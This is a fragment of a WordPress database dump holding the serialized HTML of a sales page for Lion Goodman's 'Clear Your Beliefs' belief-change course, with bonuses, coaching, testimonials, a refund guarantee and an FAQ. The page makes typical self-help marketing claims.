/>Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1882, 2167, 'panels_data', 'a:3:{s:7:"widgets";a:4:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:825:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:70516:"\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You 